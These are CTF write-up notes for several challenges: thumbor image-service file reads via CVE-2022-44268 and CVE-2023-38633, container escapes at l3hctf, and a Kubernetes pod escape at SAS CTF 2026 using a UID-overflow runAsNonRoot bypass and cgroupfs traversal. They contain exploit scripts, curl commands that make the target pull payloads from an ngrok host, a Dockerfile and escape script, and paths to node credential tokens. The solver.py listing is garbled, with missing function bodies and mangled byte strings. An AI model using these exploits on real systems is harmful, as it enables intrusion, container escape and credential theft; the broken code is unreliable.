python:3.7.11-buster vulnerable into CVE-2022-44268 (Exiftool arbitrary file read)
| Event Name | TPCTF |
| GitHub URL | - |
| Challenge Name | thumbor 1 |
tl;dr
# tl;dr
This challenge vulnerable to https://github.com/entr0pie/CVE-2022-44268 so we can read arbitrary file as example /flag.
here the payload we use to generate the `exploit.png` and solve the challenge:
solver.py#!/usr/bin/env python3
import sys
import png
import zlib
import argparse
import binascii
import logging
logging.basicConfig(stream=sys.stderr, level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
d = zlib.decompressobj()
e = zlib.compressobj()
IHDR = b'x00x00x00nx00x00x00nx08x02x00x00x00'
IDAT = b'xx9cxbdxccxa1x11xc0 x0cFxe1xb4x03Dx91x8b`xffmx98x010x89x01xc5x00xfcxb8nx8eVxf6xd9' \
def parse_data(data: bytes) -> str:
def read(filename: str):
def write(from_filename, to_filename, read_filename):
def main():
if name == 'main':
solve.shconvert -size 100x100 xc:black output.png
python3 solver.py -i output.png -o exploit.png -r /flag generate
curl "http://1.95.57.127:3502/thumbor/unsafe/300x/filters:format(png)/http://6.tcp.ngrok.io:15364/exploit.png" -o flag
python3 solver.py -i flag -o foo parse
echo "54504354467b6576316c5f504e475f6d616731636b5f4c66697d0a" | xxd -r -p
pandoc/core:2.18-ubuntu vulnerable into cve-2023-38633 (LibRSVG)
| Event Name | TPCTF |
| GitHub URL | - |
| Challenge Name | thumbor 2 |
References
tl;dr
# tl;dr
This challenge is vulnerable to https://www.canva.dev/blog/engineering/when-url-parsers-disagree-cve-2023-38633/ which can enable us to read arbitarary file using this payload:
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
</svg>
then we curl the svg making the vulerable app request our svg and process it:curl "http://1.95.57.127:3601/thumbor/unsafe/http://4.tcp.ngrok.io:16592/exploit.svg" -o flag.png
after that we will receive image contain our flag:
TPCTF{un5af3_5vg_X1nclude}
There’s special case where we can make symlink to link to the host container file.
l3hctf 2024
https://s1um4i-official.feishu.cn/docx/QeGGdeyuhoR6kuxCOj8c44wRnne#SfxUd5lMRoxkfCx1G7HcrCTbnob
detailed WU can be see there https://hust-l3hsec.feishu.cn/docx/MZ8SdwSoPo3cBTxOxbGcuUBun4c
ln -sf /flag /app/output.txt
![[Pasted image 20240206174335.png]]
dari analisis ku sih karna /dev/sda2 di mount di /app
/dev/sda2 /app ext4 rw,relatime,errors=remount-ro,stripe=256 0 0
@daffainfo
jadi klo kita ngelink sesuatu di /app dia bakal ngepointer ke /dev/sda2 filenya
ternyata karna ini
,"-v "++flags_dataDir++":/data", portDef, flags_image["docker run -d --restart=always"
,"--device /dev/ppp"
,"--cap-add=net_admin"
,"--name",n,"-h",n
,"-v "++flags_dataDir++":/data", portDef, flags_image
,"/init.sh ", escapeMany [server,user,pass]
]https://paper.seebug.org/396/
BPF cronescape
l3hctf 2024 escape-2
https://s1um4i-official.feishu.cn/docx/QeGGdeyuhoR6kuxCOj8c44wRnne https://github.com/TomAPU/bpfcronescape/
detailed WU can be see there https://hust-l3hsec.feishu.cn/docx/MZ8SdwSoPo3cBTxOxbGcuUBun4c
Kubernetes/k0s pod → node rootfs escape: runAsNonRoot UID-overflow (CVE-2024-40635) + cgroupfs path-traversal
| Event Name | SAS CTF 2026 |
| GitHub URL | - |
| Challenge Name | paradoxy (web, k0s, id=10) |
Attachments
Dockerfile.escape, escape.shReferences
runAsNonRoot, cap drop ALL, readOnlyRootFilesystem), but the host node's cgroupfs is bind-mounted at /sys/fs/cgroup; from a cwd there, relative .. traversal crosses the bind mount into the host (k0s-worker) rootfs → arbitrary node file read once you are uid 0.USER 4294967296 (=2³², kernel truncates to uid 0 — passes the kubelet "uid≠0" admission but runs as root) + WORKDIR /sys/fs/cgroup; entrypoint reads ../../../usr/local/sbin/paradoxy-bootstrap and greps SAS{ — the flag is baked into the on-node bootstrap binary. Zero network calls./root/konnectivity-agent-token + konnectivity-server :8132) is the intended path (see "Intended solution" below) but I could not crack it — agent interception wins 0 dials (apiserver→kubelet is direct on the flat node subnet), frontend ProxyService is Unimplemented, and the gopher SA has only get/list nodes (node objects contain no flag).cat ../../../etc/hostname → k0s-worker. (Technique + flag location are team-confirmed via node-rootfs read logs; literal SAS{...} not re-extracted here because the platform deploy was erroring.)why it is vulnerable
# 1) runAsNonRoot bypass (CVE-2024-40635 class): a UID > uint32 wraps to 0.
USER 4294967296 # kubelet sees uid!=0 and admits the pod; kernel truncates 2^32 -> uid 0 => ROOT
# (numeric 0 and named users are both rejected; only the overflow passes)
# 2) host cgroupfs is bind-mounted at /sys/fs/cgroup; ".." from it escapes into the NODE rootfs:
WORKDIR /sys/fs/cgroup # readlink ../../../proc/self/cwd -> /sys/fs/cgroup
# cat ../../../etc/hostname -> "k0s-worker" (the NODE hostname, not the pod's)exploit payload
cd /sys/fs/cgroup
cat ../../../etc/hostname # k0s-worker (escape confirmed)
grep -aoE 'SAS\{[^}]*\}' ../../../usr/local/sbin/paradoxy-bootstrap # the flag (try depths ../../.. .. ../../../../..)solver
FROM alpine:3.20
COPY escape.sh /escape.sh
RUN chmod +rx /escape.sh
WORKDIR /sys/fs/cgroup # cwd = host cgroupfs bind mount
USER 4294967296 # 2^32 -> uid 0 (runAsNonRoot bypass)
ENTRYPOINT ["/bin/sh","/escape.sh"]# escape.sh
cd /sys/fs/cgroup
cat ../../../etc/hostname # -> k0s-worker
for u in ../../.. ../../../.. ../../../../..; do
grep -aoE 'SAS\{[^}]*\}' "$u/usr/local/sbin/paradoxy-bootstrap" 2>/dev/null | sort -u
done
# build -> push to an anon registry -> run as a pod via the app -> read flag from its logs:
IMG=ttl.sh/pdxe-$(uuidgen | cut -c1-8):1h
docker build --platform linux/amd64 -f Dockerfile.escape -t "$IMG" . && docker push "$IMG"
curl -sk "$INSTANCE/api/send" -H 'Content-Type: application/json' -d "{\"image\":\"$IMG\"}"
curl -sk "$INSTANCE/api/pods/$POD/logs" # -> SAS{...}../../../var/lib/k0s/kubelet/pods/*/volumes/kubernetes.io~projected/.../token (konnectivity-agent, kube-router, kube-proxy, coredns), ../../../root/konnectivity-agent-token/token, ../../../var/lib/k0s/kubelet.conf.Intended solution (per author) vs. the escape above
The intended path is not the node-rootfs read — it's: run the pod as root → leak the konnectivity-agent token → attack the control plane via konnectivity:
USER 4294967296 (2³²→uid 0) bypasses runAsNonRoot → in-pod root → read the hostPath-mounted /root/konnectivity-agent-token/token (SA kube-system:konnectivity-agent).172.31.0.10:8132) to pivot into the control plane and reach the flag.The cgroupfs node-rootfs read documented above is the practical / unintended shortcut (grep SAS{ ../../../usr/local/sbin/paradoxy-bootstrap) and is the path that was actually used to grab the flag.
⚠️ Not fully reproduced: extensive testing of the konnectivity path dead-ended — a rogue agent intercepted 0 apiserver→backend dials, the frontendProxyServiceis Unimplemented on8132, thegopherSA has onlyget/list nodesand thekonnectivity-agentSA has no resource RBAC, and the apiserver (172.31.0.10:6443) is reachable but exposes no readable flag. The exact konnectivity→control-plane step that yields the flag is unconfirmed; reproduce on a local k0s cluster (controller+worker, konnectivity native) to pin it down.